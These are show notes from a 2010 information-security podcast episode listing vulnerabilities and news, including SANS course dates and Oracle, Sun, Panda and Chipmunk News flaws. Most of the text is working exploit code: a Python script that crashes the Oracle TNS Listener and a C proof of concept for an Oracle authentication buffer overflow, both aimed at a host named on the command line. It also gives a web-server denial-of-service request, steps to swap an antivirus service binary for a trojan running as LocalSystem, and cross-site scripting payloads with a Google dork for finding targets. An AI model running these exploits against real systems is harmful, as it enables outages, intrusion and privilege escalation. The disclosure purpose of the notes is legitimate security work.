InfoSec Podcast Episode 52 for January 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.
SEC-606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10
Go online to register by going to the SANS website or call (301) 654-SANS(7267).
SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)
Vulnerabilities of Interest:
- Oracle Database is subject to a remote memory-corruption vulnerability in Listener. The vulnerability can be exploited over the ‘Oracle Net’ protocol. An attacker does not require privileges to exploit this vulnerability. This vulnerability affects the following supported versions 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7. Proof of concept is available:
# TNS Listener (Oracle RDBMS) exploit, cause Listener process crash# While running on 11.1.0.7.0 win32, nsglvcrt() Listener function attempt
# to allocate huge memory block and copy *something* to it.# TID=3052|(1) MSVCR71.dll!malloc (0x4222fc5) (called from 0×438631 (TNSLSNR.EXE!nsglvcrt+0×95))
# TID=3052|(1) MSVCR71.dll!malloc -> 0×2530020
# TID=3052|(0) TNSLSNR.EXE!__intel_fast_memcpy (0×2530020, 0, 0x4222fc4) (called from 0×438647 (TNSLSNR.EXE!nsglvcrt+0xab))# (addresses are for TNS Listener 11.1.0.7.0 win32 unpatched)
# If I correct, nsglvcrt() function is involved in new service creation.# Successfully crashed:
# Oracle RDBMS 11.1.0.6.0 win32 with CPUapr2009 applied
# Oracle RDBMS 11.1.0.7.0 win32 with CPUapr2009 applied
# Oracle RDBMS 10.2.0.4 win32 with CPUapr2009 applied
# Oracle RDBMS 10.2.0.2 Linux x86
# Not crashed:
# Oracle RDBMS 11.2 Linux x86# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>
# Fixed in CPUjan2010 as CVE-2010-0071 (CVSS 10.0):
# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.htmlfrom sys import *
from socket import *sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect ((argv[1], 1521))
sockobj.send(
“\x00\x68\x00\x00\x01\x00\x00\x00″
“\x01\x3A\x01\x2C\x00\x00\x20\x00″
“\x7F\xFF\xC6\x0E\x00\x00\x01\x00″
“\x00\x2E\x00\x3A\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x28\x43\x4F\x4E\x4E\x45″
“\x43\x54\x5F\x44\x41\x54\x41\x3D”
“\x28\x43\x4F\x4D\x4D\x41\x4E\x44″
“\x3D\x73\x65\x72\x76\x69\x63\x65″
“\x5F\x72\x65\x67\x69\x73\x74\x65″
“\x72\x5F\x4E\x53\x47\x52\x29\x29″
)data=sockobj.recv(102400)
sockobj.send(
“\x02\xDE\x00\x00\x06\x00\x00\x00″
“\x00\x00\x00\x00\x02\xD4\x20\x08″
“\xFF\x03\x01\x00\x12\x34\x34\x34″
“\x34\x34\x78\x10\x10\x32\x10\x32″
“\x10\x32\x10\x32\x10\x32\x54\x76″
“\x00\x78\x10\x32\x54\x76\x44\x00″
“\x00\x80\x02\x00\x00\x00\x00\x04″
“\x00\x00\x70\xE4\xA5\x09\x90\x00″
“\x23\x00\x00\x00\x42\x45\x43\x37″
“\x36\x43\x32\x43\x43\x31\x33\x36″
“\x2D\x35\x46\x39\x46\x2D\x45\x30″
“\x33\x34\x2D\x30\x30\x30\x33\x42″
“\x41\x31\x33\x37\x34\x42\x33\x03″
“\x00\x65\x00\x01\x00\x01\x00\x00″
“\x00\x00\x00\x00\x00\x00\x64\x02″
“\x00\x80\x05\x00\x00\x00\x00\x04″
“\x00\x00\x00\x00\x00\x00\x01\x00″
“\x00\x00\x10\x00\x00\x00\x02\x00″
“\x00\x00\x84\xC3\xCC\x07\x01\x00″
“\x00\x00\x84\x2F\xA6\x09\x00\x00″
“\x00\x00\x44\xA5\xA2\x09\x25\x98″
“\x18\xE9\x28\x50\x4F\x28\xBB\xAC”
“\x15\x56\x8E\x68\x1D\x6D\x05\x00″
“\x00\x00\xFC\xA9\x36\x22\x0F\x00″
“\x00\x00\x60\x30\xA6\x09\x0A\x00″
“\x00\x00\x64\x00\x00\x00\x00\x00″
“\x00\x00\xAA\x00\x00\x00\x00\x01″
“\x00\x00\x17\x00\x00\x00\x78\xC3″
“\xCC\x07\x6F\x72\x63\x6C\x00\x28″
“\x48\x4F\x53\x54\x3D\x77\x69\x6E”
“\x32\x30\x30\x33\x29\x00\x01\x00″
“\x00\x00\x58\x00\x00\x00\x01\x00″
“\x00\x00\x50\xC5\x2F\x22\x02\x00″
“\x00\x00\x34\xC5\x2F\x22\x00\x00″
“\x00\x00\x9C\xC5\xCC\x07\x6F\x72″
“\x63\x6C\x5F\x58\x50\x54\x00\x09″
“\x00\x00\x00\x50\xC5\x2F\x22\x04″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x34″
“\xC5\xCC\x07\x6F\x72\x63\x6C\x5F”
“\x58\x50\x54\x00\x01\x00\x00\x00″
“\x05\x00\x00\x00\x01\x00\x00\x00″
“\x84\xC5\x2F\x22\x02\x00\x00\x00″
“\x68\xC5\x2F\x22\x00\x00\x00\x00″
“\xA4\xA5\xA2\x09\x6F\x72\x63\x6C”
“\x00\x05\x00\x00\x00\x84\xC5\x2F”
“\x22\x04\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\xFC\xC4\xCC\x07\x6F\x72\x63″
“\x6C\x00\x01\x00\x00\x00\x10\x00″
“\x00\x00\x02\x00\x00\x00\xBC\xC3″
“\xCC\x07\x04\x00\x00\x00\xB0\x2F”
“\xA6\x09\x00\x00\x00\x00\x00\x00″
“\x00\x00\x89\xC0\xB1\xC3\x08\x1D”
“\x46\x6D\xB6\xCF\xD1\xDD\x2C\xA7″
“\x66\x6D\x0A\x00\x00\x00\x78\x2B”
“\xBC\x04\x7F\x00\x00\x00\x64\xA7″
“\xA2\x09\x0D\x00\x00\x00\x20\x2C”
“\xBC\x04\x11\x00\x00\x00\x95\x00″
“\x00\x00\x02\x20\x00\x80\x03\x00″
“\x00\x00\x98\xC5\x2F\x22\x00\x00″
“\x00\x00\x00\x00\x00\x00\x0A\x00″
“\x00\x00\xB0\xC3\xCC\x07\x44\x45″
“\x44\x49\x43\x41\x54\x45\x44\x00″
“\x28\x41\x44\x44\x52\x45\x53\x53″
“\x3D\x28\x50\x52\x4F\x54\x4F\x43″
“\x4F\x4C\x3D\x42\x45\x51\x29\x28″
“\x50\x52\x4F\x47\x52\x41\x4D\x3D”
“\x43\x3A\x5C\x61\x70\x70\x5C\x41″
“\x64\x6D\x69\x6E\x69\x73\x74\x72″
“\x61\x74\x6F\x72\x5C\x70\x72\x6F”
“\x64\x75\x63\x74\x5C\x31\x31\x2E”
“\x31\x2E\x30\x5C\x64\x62\x5F\x31″
“\x5C\x62\x69\x6E\x5C\x6F\x72\x61″
“\x63\x6C\x65\x2E\x65\x78\x65\x29″
“\x28\x41\x52\x47\x56\x30\x3D\x6F”
“\x72\x61\x63\x6C\x65\x6F\x72\x63″
“\x6C\x29\x28\x41\x52\x47\x53\x3D”
“\x27\x28\x4C\x4F\x43\x41\x4C\x3D”
“\x4E\x4F\x29\x27\x29\x29\x00\x4C”
“\x4F\x43\x41\x4C\x20\x53\x45\x52″
“\x56\x45\x52\x00\x68\xC5\x2F\x22″
“\x34\xC5\x2F\x22\x00\x00\x00\x00″
“\x05\x00\x00\x00\x84\xC5\x2F\x22″
“\x04\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\xFC\xC4\xCC\x07\x6F\x72\x63\x6C”
“\x00\x09\x00\x00\x00\x50\xC5\x2F”
“\x22\x04\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x34\xC5\xCC\x07\x6F\x72\x63″
“\x6C\x5F\x58\x50\x54\x00″
)sockobj.close()
- Oracle Network Authentication is subject to a remote buffer-overflow vulnerability. The vulnerability can be exploited over the ‘Oracle Net’ protocol. An attacker doesn’t need specific privileges to exploit this vulnerability. Oracle Database 10g versions 10.1.0.5 and 10.2.0.4. Exploit is available:
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <assert.h>#include <string>
void s_send (SOCKET s, char *msg, DWORD size)
{
int sent;printf (“s_send: begin: %d bytes\n”, size);
sent=send (s, (char*)msg, size, 0);
if (sent==SOCKET_ERROR)
{
printf (“send() -> SOCKET_ERROR, WSAGetLastError=%d\n”, WSAGetLastError());
} elseif (sent!=size)
printf (“sent only %d bytes\n”, sent);printf (“s_send: end\n”);
};void s_recv (SOCKET s)
{
char buf[20000];
int r;struct timeval t;
fd_set fd;t.tv_sec=0;
t.tv_usec=100000; // 100 msprintf (“s_recv: begin\n”);
FD_ZERO(&fd);
FD_SET(s, &fd);if (select (0, &fd, 0, 0, &t))
// if (select (0, &fd, 0, 0, NULL))
{
r=recv (s, buf, 20000, 0);
if (r!=0 && r!=-1)
{
printf (“got %d bytes\n”, r);
}
else
{
printf (“connection lost, r=%d\n”, r);
};
}
else
{
printf (“select() returns zero\n”);
};
};unsigned char NSPTCN[]=
{
0×00, 0×00, 0×00, 0×00, 0×01, 0×00, 0×00, 0×00,
0×01, 0x3A, 0×01, 0x2C, 0×00, 0×41, 0×20, 0×00,
0x7F, 0xFF, 0xC6, 0x0E, 0×00, 0×00, 0×01, 0×00,
0×00, 0×00, 0×00, 0x3A, 0×00, 0×00, 0×02, 0×00,
//^^ ^^ cmd len
0×61, 0×61, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00};
#define NSPTCN_HEADER_LEN 58
unsigned char NSPTDA[]=
{
0×00, 0×00, 0×00, 0×00, 0×06, 0×00, 0×00, 0×00,
// ^^ ^^ packet len
0×00, 0×00
};#define NSPTDA_HEADER_LEN 10
void s_send_NSPTDA (SOCKET s, char *msg, int size)
{
char * buf;
int sz=size + NSPTDA_HEADER_LEN;buf=(char*)malloc (sz);
NSPTDA[0]=( sz ) >> 8;
NSPTDA[1]=( sz ) & 0xFF;memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN);
memcpy (buf + NSPTDA_HEADER_LEN, msg, size);printf (“s_send_NSPTDA: sending %d bytes…\n”, sz);
s_send (s, (char*)buf, sz);
free (buf);
};void s_send_TNS_command (SOCKET s, const char *cmd)
{
unsigned char * pkt;
int cmd_len=strlen (cmd);printf (“sending [%s]\n”, cmd);
printf (“len: %d\n”, cmd_len);if (cmd_len<231)
{int str_len=strlen(cmd);
int pkt_len=str_len+58;pkt=(unsigned char*)malloc (str_len+58);
memcpy (pkt,
“\x00\x00\x00\x00\x01\x00\x00\x00″
// plenH, plenL
“\x01\x3A\x01\x2C\x00\x41\x20\x00″
“\x7F\xFF\xC6\x0E\x00\x00\x01\x00″
“\x00\x00\x00\x3A\x00\x00\x02\x00″
// cmdlenH cmdlenL
“\x61\x61\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00″, 58);memcpy (pkt+58, cmd, str_len);
pkt[1]=pkt_len&0xFF;
pkt[0]=(pkt_len>>8)&0xFF;pkt[25]=str_len&0xFF;
pkt[24]=(str_len>>8)&0xFF;s_send (s, (char*)pkt, pkt_len);
free (pkt);
}
else
{
// something should be modified here in NSPTCN
assert (0);
};
};bool try_host (char * h)
{
struct hostent *hp;
WSADATA wsaData;
struct sockaddr_in sin;
int r;
struct timeval t;
fd_set fd;
SOCKET s;
char pkt1318[1318];WSAStartup(MAKEWORD(1, 1), &wsaData);
hp=gethostbyname (h);
assert (hp!=NULL);s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
assert (s!=INVALID_SOCKET);
{
u_long on=1;
assert (ioctlsocket(s, FIONBIO, &on) != -1);
};sin.sin_family=AF_INET;
sin.sin_port=htons(1521);
memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);r=connect(s, (struct sockaddr *)&sin, sizeof(sin));
t.tv_sec=3;
t.tv_usec=0;FD_ZERO(&fd);
FD_SET(s, &fd);if (select (0, 0, &fd, 0, &t))
{
printf (“connected to %s\n”, h);s_send_TNS_command (s, “(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))”);
// waiting for NSPTRS
s_recv(s);
s_send_TNS_command (s, “(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))”);
// waiting for NSPTAC
s_recv(s);
// send NA packet
s_send (s,
“\x00\x9C\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF\x00\x92″
“\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00″
“\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71″
“\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00″
“\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00″
“\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00″
“\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00″
“\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A”
“\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00″
“\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01″
,156);s_recv (s);
// send TTIPRO
s_send (s,
“\x00\x25\x00\x00\x06\x00\x00\x00\x00\x00\x01\x06\x05\x04\x03\x02″
“\x01\x00\x49\x42\x4D\x50\x43\x2F\x57\x49\x4E\x5F\x4E\x54\x2D\x38″
“\x2E\x31\x2E\x30\x00″
, 37);s_recv (s);
// send TTIDTY
s_send (s,
“\x00\x4B\x00\x00\x06\x00\x00\x00\x00\x00\x02\xB2\x00\xB2\x00\xD2″
“\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01″
“\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01″
“\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00″
“\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07″
, 75);s_recv (s);
// call OSESSKEY
s_send (s,
“\x00\xDA\x00\x00\x06\x00\x00\x00\x00\x00\x03\x76\x02\xFE\xFF\xFF”
“\xFF\x05\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF\x05\x00\x00″
“\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0D”
“\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41″
“\x4C\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F”
“\x00\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D”
“\x5F\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65″
“\x78\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F”
“\x4D\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B”
“\x47\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08″
“\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00″
“\x09\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00″
“\x00\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06″
“\x64\x65\x6E\x6E\x69\x73\x00\x00\x00\x00″
, 218);// call OAUTH
memcpy (pkt1318,
“\x05\x26\x00\x00\x06\x00\x00\x00\x00\x00\x03\x73\x03\xFE\xFF\xFF”
“\xFF\x05\x00\x00\x00\x01\x01\x00\x00\xFE\xFF\xFF\xFF\x12\x00\x00″
“\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0C”
“\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x53\x45\x53\x53\x4B\x45\x59″
“\x40\x00\x00\x00\x40\x36\x33\x41\x45\x31\x36\x41\x30\x44\x31\x41″
“\x46\x31\x45\x39\x33\x37\x41\x44\x36\x36\x46\x34\x46\x31\x35\x36″
“\x37\x31\x30\x33\x30\x34\x46\x36\x36\x30\x31\x44\x30\x45\x33\x35″
“\x34\x37\x46\x42\x46\x39\x35\x34\x39\x37\x34\x32\x33\x30\x42\x43″
“\x30\x36\x45\x34\x30\x01\x00\x00\x00\x0D\x00\x00\x00\x0D\x41\x55″
“\x54\x48\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x40\x00\x00\x00\x40″
“\x36\x31\x37\x35\x31\x42\x45\x35\x34\x37\x31\x30\x44\x45\x41\x46″
“\x38\x46\x42\x33\x34\x32\x45\x36\x32\x41\x45\x35\x30\x45\x44\x38″
“\x45\x43\x38\x30\x39\x33\x31\x44\x33\x44\x45\x34\x42\x33\x41\x37″
“\x34\x35\x38\x37\x45\x36\x46\x32\x36\x46\x37\x45\x45\x30\x34\x34″
“\x00\x00\x00\x00\x08\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x52\x54″
“\x54\x05\x00\x00\x00\x05\x32\x38\x30\x32\x38\x00\x00\x00\x00\x0D”
“\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x43\x4C\x4E\x54\x5F\x4D\x45″
“\x4D\x04\x00\x00\x00\x04\x34\x30\x39\x36\x00\x00\x00\x00\x0D\x00″
“\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41\x4C”
“\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F\x00″
“\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D\x5F”
“\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65\x78″
“\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x4D”
“\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B\x47″
“\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08\x00″
“\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00\x09″
“\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00\x00″
“\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06\x64″
“\x65\x6E\x6E\x69\x73\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45″
“\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x43\x48\x41″
“\x52\x53\x45\x54\x03\x00\x00\x00\x03\x31\x37\x38\x00\x00\x00\x00″
“\x17\x00\x00\x00\x17\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49″
“\x45\x4E\x54\x5F\x4C\x49\x42\x5F\x54\x59\x50\x45\x01\x00\x00\x00″
“\x01\x31\x00\x00\x00\x00\x1A\x00\x00\x00\x1A\x53\x45\x53\x53\x49″
“\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x44\x52\x49\x56\x45\x52″
“\x5F\x4E\x41\x4D\x45\x0E\x00\x00\x00\x0E\x63\x78\x5F\x4F\x72\x61″
“\x63\x6C\x65\x2D\x34\x2E\x34\x20\x00\x00\x00\x00\x16\x00\x00\x00″
“\x16\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F”
“\x56\x45\x52\x53\x49\x4F\x4E\x09\x00\x00\x00\x09\x31\x38\x35\x35″
“\x39\x39\x34\x38\x38\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45″
“\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x4C\x4F\x42″
“\x41\x54\x54\x52\x01\x00\x00\x00\x01\x31\x00\x00\x00\x00\x08\x00″
“\x00\x00\x08\x41\x55\x54\x48\x5F\x41\x43\x4C\x04\x00\x00\x00\x04″
“\x34\x34\x30\x30\x00\x00\x00\x00\x12\x00\x00\x00\x12\x41\x55\x54″
“\x48\x5F\x41\x4C\x54\x45\x52\x5F\x53\x45\x53\x53\x49\x4F\x4E\xE9″
“\x01\x00\x00\xFE\xFF\x41\x4C\x54\x45\x52\x20\x53\x45\x53\x53\x49″
“\x4F\x4E\x20\x53\x45\x54\x20\x4E\x4C\x53\x5F\x4C\x41\x4E\x47\x55″
“\x41\x47\x45\x3D\x20\x27\x41\x4D\x45\x52\x49\x43\x41\x4E\x27\x20″
“\x4E\x4C\x53\x5F\x54\x45\x52\x52\x49\x54\x4F\x52\x59\x3D\x20\x27″
“\x41\x4D\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x43\x55\x52″
“\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x49″
“\x53\x4F\x5F\x43\x55\x52\x52\x45\x4E\x43\x59\x3D\x20\x27\x41\x4D”
“\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x4E\x55\x4D\x45\x52″
“\x49\x43\x5F\x43\x48\x41\x52\x41\x43\x54\x45\x52\x53\x3D\x20\x27″
“\x2E\x2C\x27\x20\x4E\x4C\x53\x5F\x43\x41\x4C\x45\x4E\x44\x41\x52″
“\x3D\x20\x27\x47\x52\x45\x47\x4F\x52\x49\x41\x4E\x27\x20\x4E\x4C”
“\x53\x5F\x44\x41\x54\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27″
“\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x27\x20\x4E\x4C\x53\x5F\x44″
“\x41\x54\x45\x5F\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x20\x27\x41″
“\x4D\x45\x52\x49\x43\x41\x4E\x27\x20\x4E\x4C\x53\x5F\x53\x4F\x52″
“\x54\x3D\x20\x27\x42\x49\x4E\x41\x52\x59\x27\x20\x54\x49\x4D\x45″
“\x5F\x5A\x4F\x4E\xEA\x45\x3D\x20\x27\x2B\x30\x33\x3A\x30\x30\x27″
“\x20\x4E\x4C\x53\x5F\x43\x4F\x4D\x50\x3D\x20\x27\x42\x49\x4E\x41″
“\x52\x59\x27\x20\x4E\x4C\x53\x5F\x44\x55\x41\x4C\x5F\x43\x55\x52″
“\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x54″
“\x49\x4D\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27\x48\x48\x2E”
“\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C\x53″
“\x5F\x54\x49\x4D\x45\x53\x54\x41\x4D\x50\x5F\x46\x4F\x52\x4D\x41″
“\x54\x3D\x20\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48″
“\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C”
“\x53\x5F\x54\x49\x4D\x45\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54″
“\x3D\x20\x27\x48\x48\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41″
“\x4D\x20\x54\x5A\x52\x27\x20\x4E\x4C\x53\x5F\x54\x49\x4D\x45\x53″
“\x54\x41\x4D\x50\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20″
“\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48\x2E\x4D\x49″
“\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x20\x54\x5A\x52\x27\x00\x00″
“\x00\x00\x00\x00\x17\x00\x00\x00\x17\x41\x55\x54\x48\x5F\x4C\x4F”
“\x47\x49\x43\x41\x4C\x5F\x53\x45\x53\x53\x49\x4F\x4E\x5F\x49\x44″
“\x20\x00\x00\x00\x20\x35\x44\x46\x34\x37\x43\x45\x35\x42\x38\x42″
“\x32\x34\x43\x46\x38\x42\x46\x42\x36\x46\x30\x46\x36\x39\x32\x42″
“\x38\x46\x42\x39\x38\x00\x00\x00\x00\x10\x00\x00\x00\x10\x41\x55″
“\x54\x48\x5F\x46\x41\x49\x4C\x4F\x56\x45\x52\x5F\x49\x44\x00\x00″
“\x00\x00\x00\x00\x00\x00″
,1318);pkt1318[0x41]=0×80;
s_send (s, pkt1318, 1318);
assert (closesocket (s)==0);
return true;
}
else
{
printf (“while connect(): select() returns zero\n”);
assert (closesocket (s)==0);
return false;
};
};void main(int argc, char * argv[])
{printf (“CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32\n”);
printf (“Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.info\n”);
if (argv[1]==NULL)
{
printf (“use: %s <hostname>\n”, argv[0]);
return;
};try_host (argv[1]);
}; - Sun Java System Web Server is subject to a denial-of-service vulnerability. An attacker can exploit this issue to crash the effected application, denying service to legitimate users. Sun Java System Web Server 7.0 Update 6 is affected; other versions may also be vulnerable. Example request is available: ” / HTTP/1.0\n\n”
- Panda Security is subject to a local privilege escalation vulnerability. The following versions are affected: Panda Security for Business 4.04.10, Panda Security for Business with Exchange 4.04.10, Panda Security for Enterprise 4.04.10, Panda Internet Security 2010 (15.01.00), Panda Global Protection 2010 (3.01.00), Panda Antivirus Pro 2010 (9.01.00), Panda Antivirus for Netbooks (9.01.00), During installation of Panda Security for Desktops/File Servers the permissions for installation folder: %ProgramFiles%Panda SoftwareAVTC are by default set to Everyone:Full Control. Services are started from this folder and those services are started under LocalSystem account. The 32bit Version of Panda Security for Desktops/File Servers installs the TruePrevent package by default, which protects the files in the installation directory from manipulation.
If the TruePrevent Service (Panda TPSrv) is not running the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which the TPSrv is not started and all services files can be manipulated. This can be exploited by:
a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot
Upon reboot trojaned application will be executed with LocalSystem account. - Chipmunk News 2.0 is subject to multiple cross site scripting vulnerabilities. This affects the sub, addaddress and searchaddress modules. Google Dork: inurl:admin/login.php “Registering Admin”. Exploit samples are available:
http://localhost/sub.php
POSTDATA: email=<script>alert(‘xss’)</script>&choice=sub&lists=1& amp;submit=submit
http://localhost/admin/addaddress.php
POSTDATA: email=<script>alert(‘xss’)</script>&lists=1&submit=submit
http://localhost/admin/searchaddress.php
POSTDATA: theaddress=<script>alert(‘xss’)</script>&submit=submit
News Items of Interest:
News item 1: http://news.softpedia.com/news/Hundreds-of-Websites-Hosted-at-Network-Solutions-Defaced-132654.shtml
Network Solutions announced that several hundred websites hosted on its infrastructure fell victim in a mass defacement attack during the past several days. Preliminary findings suggest that a remote file inclusion technique was used to compromise several of the company’s Unix servers.
Network Solutions is one of the top five Internet domain name registrars, managing around 6.5 million domains as of January 2009. Apart from its successful domain registration business, the company also offers other services such as Web hosting, ecommerce or online marketing solutions.
News item 2: http://news.bbc.co.uk/2/hi/technology/8470735.stm
Manchester United Football Club has posted a message on its website explaining that its players do not belong to online social networks. It advises users to treat any profiles in the names of its players with “extreme scepticism”. The club says this is because of the high numbers of people impersonating team members online. There are many accounts across social network sites which claim to be in the name of high profile footballers.
News item 3: http://www.symantec.com/about/news/release/article.jsp?prid=20100120_02
Comcast is partnering with Symantec to offer residential and business high-speed Internet subscribers at no-cost Norton Security Suite. The suite includes PC security that protects against viruses, spyware, worms, Trojans, malicious bots, identity theft, as well as a range of customizable parental controls, which help keep children safe online and fosters communication between parents and kids. Comcast subscribers with Macintosh systems will receive Norton Internet Security for Mac.
News item 4: http://support.apple.com/kb/HT4004
Apple has released six patches for Mac OS X and Mac OS X Server, including one for a zero-day flaw that could allow a hacker to hijack a web-browsing session. The zero-day vulnerability, which was made public in November 2009, lies in an authentication gap in TLS (Transport Layer Security) and SSL (Secure Sockets Layer) encryption protocols, Apple said in an advisory on Tuesday.
